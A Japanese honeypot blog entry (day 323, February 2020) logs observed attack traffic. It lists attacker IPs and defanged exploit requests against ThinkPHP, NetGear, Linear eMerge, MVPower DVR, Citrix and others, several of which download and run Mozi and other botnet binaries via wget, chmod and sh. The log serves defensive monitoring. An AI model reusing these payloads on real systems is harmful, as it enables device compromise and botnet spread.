23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(323日目)

2020/02/03(月)

トータルは121件でした。

ハンティングログは以下です。

220.92.153[.]250 wget hxxp[:]//switchnets.net/hoho.arm7

www.virustotal.com
www.virustotal.com

89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101[.]182/.t/80/arm7

www.virustotal.com
www.virustotal.com

182.127.55[.]152 wget+hxxp[:]//182.127.55[.]152:53566/Mozi.m

www.virustotal.com
www.virustotal.com

27.15.82[.]232 wget+hxxp[:]//27.15.82[.]232:39880/Mozi.m

www.virustotal.com
www.virustotal.com

118.68.0[.]157 wget+hxxp[:]//scan.casualaffinity.net/jaws

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
40 調査 GET /script
30 アクセス GET /
12 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
9 調査 GET /is_test
6 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
2 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
2 Tomcatの調査 GET /manager/text/list
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Citrix製品の脆弱性を狙っら通信 GET /vpn/js/%2e./.%2e/%76pns/cfg/smb.conf
1 NetGear製品の脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//27.15.82.232:39880/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 NetGear製品の脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//182.127.55.152:53566/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 GET /logs
1 GET /index.php
1 環境設定の調査 GET /.env
1 不正中継の試み CONNECT ip.ws.126.net:443
1 GPONルーター脆弱性を狙った通信 POST /GponForm/diag_Form?images/
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 MVPower DVRの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//scan.casualaffinity.net/jaws;sh+/tmp/jaws
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm